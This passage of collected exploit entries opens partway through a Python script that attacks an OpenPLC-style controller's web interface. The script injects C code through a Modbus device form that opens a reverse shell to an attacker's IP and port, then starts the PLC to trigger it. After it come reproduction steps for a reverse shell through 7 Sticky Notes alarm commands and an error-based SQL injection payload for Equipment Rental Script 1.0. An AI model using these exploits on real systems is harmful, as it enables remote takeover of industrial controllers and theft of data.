PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n" upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) act_url = host + "/upload-program-action" act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"} act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n" upload_act = x.post(act_url, headers=act_headers, data=act_data) time.sleep(2) def connection(): print('[+] add device...') inject_url = host + "/add-modbus-device" # inject_dash = host + "/dashboard" inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"} inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"} inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_port\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_baud\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_parity\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_data\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_stop\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_pause\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"di_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"di_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"do_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"do_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"ai_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"ai_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aor_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aor_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aow_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aow_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------169043028319378579443281515639--\r\n" # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n" inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data) time.sleep(3) # comp = x.get(compile_program) # time.sleep(6) # x.get(inject_dash) # time.sleep(3) # print('[+] Spawning Reverse Shell...') start = x.get(run_plc_server) time.sleep(1) if start.status_code == 200: print('[+] Reverse connection receveid!') sys.exit(0) else: print('[+] Failed to receive connection :(') sys.exit(0) auth() injection() connection()

# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 12.09.2023 # Vendor Homepage: http://www.7stickynotes.com # Software Link: http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe # Tested Version: 1.9 (latest) # Tested on: Windows 2019 Server 64bit # # # Steps to Reproduce # # # # Open the program. # Click on "New Note". # Navigate to the "Alarms" tab. # Click on either of the two buttons. # From the "For" field, select "1" and "seconds" (to obtain the shell within 1 second). # From the "Action" dropdown, select "command". # In the activated box, enter the reverse shell command and click the "Set" button to set the alarm. # Finally, click on the checkmark to save the alarm. # Reverse shell obtained!

## Title: Equipment Rental Script-1.0 - SQLi ## Author: nu11secur1ty ## Date: 09/12/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The package_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the package_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The attacker can steal all information from the database! [+]Payload: mysql Parameter: #1* ((custom) POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: package_id=(-4488))) OR 1 GROUP BY CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0 END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00 ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0 System Administrator - Infrastructure Engineer Penetration Testing Engineer home page: https://www.nu11secur1ty.com/

